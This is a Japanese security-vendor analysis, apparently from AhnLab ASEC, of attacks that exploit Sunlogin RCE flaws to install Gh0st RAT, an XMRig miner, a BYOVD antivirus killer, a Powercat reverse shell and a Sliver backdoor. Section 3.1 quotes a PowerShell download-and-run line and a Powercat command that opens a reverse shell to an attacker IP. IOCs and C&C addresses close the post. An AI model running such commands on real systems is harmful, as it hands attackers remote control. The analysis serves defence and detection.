Sunlogin 脆弱性攻撃で拡散している Sliver マルウェア with BYOVD

Sliver は Go 言語で開発されたオープンソースペネトレーションテストツールである。ペネトレーションテストのツールとして代表的なものとしては、Cobalt Strike と Metasploit があり、実際に多くの攻撃者が愛用している。ASEC ブログでも様々な攻撃事例を紹介してきた。最近では Cobalt Strike や Metasploit 以外にも、攻撃者が Sliver を使用する事例が確認されている。

ASEC (AhnLab Security Emergengy response Center)分析チームは、脆弱性がパッチされていないシステムや不適切に設定されたシステムを対象にする攻撃をモニタリングしており、最近 Sliver バックドアが特定のソフトウェアについての脆弱性攻撃と推定されるプロセスを通してインストールされていることを確認した。攻撃者はこれ以外にも Sliver バックドアだけでなく BYOVD (Bring Your Own Vulnerable Driver)マルウェアを攻撃に利用しており、セキュリティ製品を無効化してリバースシェルをインストールしていた。

脆弱性攻撃の対象になるソフトウェアは Sunlogin という中国で開発された遠隔制御プログラムである。昨年、遠隔コード実行の脆弱性(CNVD-2022-10270 / CNVD-2022-03672)とこれを Exploit するコードが公開された Sunlogin は最近までも継続的に脆弱性攻撃の対象になっている。

ここではまず Sliver ペネトレーションテストツールについて簡単に整理する。その後当社 ASD(AhnLab Smart Defense) ログを通して Sunlogin を対象に続いている攻撃事例について紹介する。最後に最近確認された攻撃事例で、最終的に Sliver と BYOVD マルウェアをインストールする攻撃事例について整理する。

1. Sliver

ペネトレーションテストツールであり、企業や機関のネットワークおよびシステムについての脆弱性を点検するための目的で使用されるツールである。一般的にはペネトレーションテストの段階別に様々な機能をサポートしているため、攻撃者が使用する際は、悪意のある目的で使用されることが特徴である。

代表的な商用ペネトレーションテストツールというと、Cobalt Strike が挙げられ、クラックバージョンが流出したことにより、最近までも様々な攻撃者によって使用されている。これ以外にも、オープンソースで開発された Metasploit があり、他のツールと同じく簡単に手に入れられるため、攻撃者が頻繁に使用している。Cobalt Strike や Metasploit 以外にも様々なペネトレーションテストツールが存在し、最近はオープンソースペネトレーションテストツールである Sliver を使用する事例が多く確認されている。[1]

Sliver の特徴としてはクロスプラットフォームをサポートする Go 言語で開発されているため、Windows だけではなく Linux、MacOS をサポートしているという点があげられる。それ以外にも相対的に、最近開発されたという点も特徴であると言えるが、これは Cobalt Strike や Metasploit のようにすでに以前から攻撃者によって使用されているツールは、すでにセキュリティ製品によって簡単に検知されてしまうためである。そのため Sliver は様々な攻撃者によって、Cobalt Strike のような既存ツールの代替として使用されている。[2] [3] [4]

Sliver によって生成されたバックドアは、攻撃者のコマンドを受け取って様々な不正な振る舞いを実行できる。サポートしている機能はプロセスおよびファイルのタスク、コマンドの実行、アップロード/ダウンロード、スクリーンショットキャプチャなどのような一般的なバックドアや RAT マルウェアがサポートしている大半の機能を使用できる。それ以外にも権限の昇格やプロセスメモリのダンプ、ラテラルムーブメントのような内部イントラネットの掌握のために必要な様々な機能が提供されている。

アンチウイルスを含むセキュリティ製品はファイルや振る舞い、メモリの観点以外にもマルウェアが C&C サーバーと通信するネットワークの振る舞いについても検知できる機能をサポートしている。それによって Cobalt Strike を含む様々なペネトレーションテストツールは、ネットワーク検知を回避するために C&C サーバーの通信を回避する様々な方式を提供している。Sliver も C&C サーバーの通信に mTLS、WireGuard、HTTP(S)、そして DNS を利用しており、セキュリティ製品のネットワーク検知を回避できるようにネットワーク通信の暗号化をサポートしている。

それ以外にも Sliver のバックドアは2つのモードをサポートしているが、セッションモード(Session Mode)とビーコンモード(Beacon Mode)がそれにあたる。セッションモードでビルドされた Sliver はリアルタイムで C&C サーバーと通信を行い、ビーコンモードでビルドされた Sliver は C&C サーバーと同期せずに通信し、周期的に C&C サーバーからコマンド、すなわち実行するタスクを受け取ってから実行し、結果を伝達する方式をとっている。

2. Sunlogin 対象の脆弱性攻撃および事例

Sunlogin は中国の Oray 社が開発した遠隔制御ユーティリティである。2022年に遠隔コード実行の脆弱性である CNVD-2022-10270 / CNVD-2022-03672 と、これを Exploit するコードが公開され[5]、その後これらを利用した脆弱性攻撃が確認されている。攻撃対象になる脆弱なプロセスは「SunloginCLient.exe」であると推定され[6]、実際に当社 ASD ログでも2022年の初めから様々な攻撃が確認されている。

2.1. Gh0st RAT

攻撃に使用されるパケットは確認されていないが、「SunloginCLient.exe」プロセスによる PowerShell コマンドが実行され、Sunlogin RCE 脆弱性攻撃によってマルウェアがインストールされるものと推定される。実際の攻撃に使用される「SunloginCLient.exe」もすでにパッチされた v11.0.0.33 よりも以前のバージョンが使用される。以下は PowerShell が Gh0st RAT をダウンロードしてインストールするプロセスツリーであり、「SunloginCLient.exe」プロセスにより PowerShell が実行されることが分かる。

これ以外にも攻撃に使用されたコマンドを通して推定できるが、まず公開された PoC からは脆弱性攻撃時に、以下のコマンドを使用する。[7]

上記の Gh0st RAT 攻撃で使用されたコマンドは以下のようになり、上の PoC で使用されたコマンドと類似している。

2.2. XMRig コインマイナー

攻撃者は Gh0stRAT 以外に XMRig コインマイナーをインストールすることもある。当社 ASD ログによると「SunloginCLient.exe」プロセスによって以下のコマンドが実行され、「syse.bat」バッチマルウェアをダウンロードして実行する。

「syse.bat」は外部から 7z とともにハードウェア環境に応じて「t.zip」もしくは「t_64.zip」圧縮ファイルをダウンロードし、権限に応じて「C:\windows\WinSysMaintenance\.arc」もしくは「C:\WinSysMaintenance\.arc 」パスに解凍する。

圧縮ファイルには XMRig コインマイナーがそのまま存在している代わりに、Launcher および Loader マルウェアを経て実行される。「watch.exe」が Launcher であり、「splwow32.exe」がエンコードされた XMRig である「WINSysCoreR.bin」ファイルをロードして復号化し、メモリ上で実行する Loader マルウェアである。

「syse.bat」はその後 XMRig のウォレットアドレスを変更し、「splwow32.exe」の引数として「WINSysCoreR.bin」を伝達して実行することで、感染システムからモネロ(Monero)コインをマイニングする。

3. 最近の攻撃事例

Sunlogin RCE 脆弱性を利用した攻撃事例は続いており、主に上記で取り扱った Gh0st RAT と XMRig コインマイナーをインストールする事例が多く確認されている。最近では Sliver バックドアと Powercat リバースシェルをインストールする攻撃も確認されており、それについて本記事で紹介する。

攻撃者はまず Sunlogin RCE 脆弱性を利用して PowerShell スクリプトをインストールするが、この PowerShell スクリプトは BYOVD 技法を利用したシステムにインストールされたセキュリティ製品を無効にし、Powercat を利用してリバースシェルをインストールする機能を担っている。同じ攻撃者であるかの確認は出来ていないが、数時間後に同じシステムを対象に Sunlogin RCE 脆弱性攻撃を通して Sliver バックドアがインストールされたログが確認できた。

3.1. BYOVD & Powercat

このシステムで最初に実行されたコマンドは以下のように「2.ps1」PowerShell スクリプトをダウンロードして実行するコマンドである。

PowerShell スクリプトは難読化されているが、整理すると以下のように大きく2つの機能を担う単純な形態であることが分かる。最初の機能は圧縮されている .NET PE を復号化し、メモリ上にロードおよび実行する機能である。エンコードされた PE は .NET で開発されており、PowerShell コマンドを通して kdjvasbulidcfaeusyefoaexwyroaw7fyoaeufhodusicvfy8cye() 関数が実行される。

「ujacldfajlvjfaslflcevdfuaelfiua.exe」はオープンソースに公開された Mhyprot2DrvControl を攻撃者が直接修正し、セキュリティ製品を強制的に終了するように具現されたものであると推定される。[8]オープンソースとは異なり、マルウェアは以下のように AvList すなわち強制終了するアンチウイルス製品のプロセス名をリストにして持っている。

Mhyprot2DrvControl は BYOVD (Bring Your Own Vulnerable Driver)技法を利用しているが、BYOVD 技法は脆弱な Windows の正常なドライバーファイルを悪用して昇格された権限で不正な振る舞いを実行する方式である。最近では、セキュリティ製品を回避することを目的に攻撃者が BYOVD 技法を利用して権限を昇格させたあと、昇格した権限でセキュリティ製品を終了させる攻撃方式が広く利用されている。[9]

Mhyprot2DrvControl は具体的に mhyprot2.sys ファイルを悪用するが、このファイルはゲーム「原神」を提供している中国のゲーム会社である miHoYo 社が開発したアンチチートドライバーである。mhyprot2.sys は有効な署名で認証された正常なドライバーファイルであるが、これを呼び出すプロセスについての検証条件が脆弱であり、簡単な回避プロセスだけでマルウェアが mhyprot2.sys を通してカーネル領域にアクセスできるようになる。Mhyprot2DrvControl の開発者は mhyprot2.sys を利用して昇格した権限で実行できる様々な機能を提供しており、攻撃者はこの中でも、プロセスを終了させることのできる機能を利用して多数のアンチウイルス製品を終了するマルウェアを製作した。

PowerShell スクリプトの2番目の機能は、外部から Powercat をダウンロードし、これを利用して感染システムでリバースシェルを実行することである。実行されるリバースシェルは C&C サーバーに接続して攻撃に cmd.exe、すなわちシェルを提供することで、攻撃者は感染システムの制御権を獲得できる。

IEX (New-Object Net.Webclient).DownloadString(“hxxp://45.144.3[.)216/powercat.ps1”);
powercat -c 45.144.3.216 -p 14356 -e cmd

3.2. Sliver バックドアの攻撃事例

攻撃者は脆弱性を利用して、上記の PowerShell スクリプト以外にも「acl.exe」マルウェアをインストールする PowerShell コマンドを実行していた。以下は Sunlogin RCE 脆弱性を通して実行された PowerShell コマンドについての当社 ASD のログである。

ダウンロードされた「acl.exe」は Sliver バックドアである。Sliver はバックドアのビルド時に基本的に難読化されるため、デコンパイル後も以下のように難読化された Go 関数のみを確認できる。これは攻撃者が追加のパックプロセスを経ず、Sliver フレームワークを利用して生成したバイナリをそのまま攻撃に使用したことを意味する。

関数名は難読化されているが、実質的なルーティンは同じであるため、静的コード解析を通して攻撃に使用された Sliver がセッションモードでビルドされており、C&C サーバーとの通信に mTLS プロトコルを使用していることが分かる。そして以下のように、デバッグプロセスを通して Sliver バックドアの名前および C&C サーバーアドレスのような復号化された設定データを確認できる。

• Sliver バックドア名 : LITERARY_WHOLE
• C&C サーバーアドレス : mtls://43.128.62[.]42:8888

4. 結論

最近、パッチされていない脆弱なソフトウェアを対象とした Sliver バックドアを含む様々なマルウェアをインストールする事例が確認されている。Sliver は最近、企業システムの情報を窃取してランサムウェアをインストールする攻撃グループによって様々な攻撃に使用されている。これはペネトレーションテストツールである Sliver が Cobalt Strike のようにアカウント情報の窃取および内部イントラネットの移動を経て企業の内部イントラネットの掌握まで段階別に必要な機能を提供しているためである。

ユーザーはインストールされたソフトウェアを最新バージョンでパッチし、脆弱性攻撃を事前に防がなくてはならない。また、V3 を最新バージョンにアップデートしてマルウェアへの感染を事前に遮断できるように注意を払わなければならない。

ファイル検知
– CoinMiner/BAT.Generic.SC185824 (2023.01.24.03)
– Trojan/Win.Launcher.C5364876 (2023.01.24.00)
– Trojan/Win.Loader.C5364877 (2023.01.24.00)
– CoinMiner/BIN.Encoded (2023.01.24.03)
– CoinMiner/Text.Config (2023.01.24.03)
– Trojan/Win32.RL_Agent.R362708 (2021.01.12.05)
– Trojan/PowerShell.Obfuscated (2023.01.24.03)
– Trojan/Win.KILLAV.C5363966 (2023.01.22.02)
– Trojan/PowerShell.Powercat.S1567 (2021.07.07.02)
– Trojan/Win.Sliver.C5363965 (2023.01.22.02)

ビヘイビア検知
– Execution/MDP.Powershell.M2514
– Malware/MDP.DriveByDownload.M1659

AMSI 検知
– Trojan/Win.KILLAV.C5363966 (2023.01.22.02)
– Trojan/PowerShell.Powercat.SA1567 (2021.07.07.02)

IOC
MD5
– 836810671d8e1645b7dd35b567d75f27 : XMRig Downloader Batch (syse.bat)
– 29d04d986a31fbeab39c6b7eab5f5550 : Launcher (watch.exe)
– 17a84000567055be92bda8659de5184d : Loader (splwow32.exe)
– 57b21f6b5d50e4ec525bee77bc724a4d : Encoded XMRig (WINSysCoreR.bin)
– 7eaa2e3d9c8b7aa6ecdd8dad0d1ba673 : config.json
– 1c5e484da6e6e1c2246f6d65f23bb49b : config.json
– 8c10401a59029599bed435575914b30d : Gh0stRAT
– 2434d32b1bebf22ac7ab461a44cf1624 : Powershell Script (2.ps1)
– f71b0c2f7cd766d9bdc1ef35c5ec1743 : AV Killer – BYOVD (ujacldfajlvjfaslflcevdfuaelfiua.exe)
– 8a319fa42e7c7432318f28a990f15696 : Powercat (powercat.ps1)
– 6f0c0faada107310bddc59f113ae9013 : Sliver Backdoor (acl2.exe)

Download
– hxxp://5.199.173[.]103/syse.bat : XMRig Downloader Batch
– hxxp://5.199.173[.]103/t.zip : XMRig zip
– hxxp://5.199.173[.]103/t_64.zip : XMRig zip
– hxxp://5.199.173[.]103/7za.exe : 7z
– hxxp://61.155.8[.]2:81/c6/include/images/help23.sct : Gh0st RAT
– hxxp://45.144.3[.]216/2.ps1 : PowerShell Malware
– hxxp://45.144.3[.]216/powercat.ps1 : Powercat
– hxxp://43.128.62[.]42/acl.exe : Sliver Backdoor

C&C
– idc6.yjzj[.]org:56573 : Gh0st RAT
– 45.144.3[.]216:14356 : Powercat Reverse Shell
– 43.128.62[.]42:8888 : Sliver Backdoor

関連 IOC および詳細な解析情報は、AhnLab の次世代脅威インテリジェンスプラットフォーム「AhnLab TIP」サブスクリプションサービスを通して確認できる。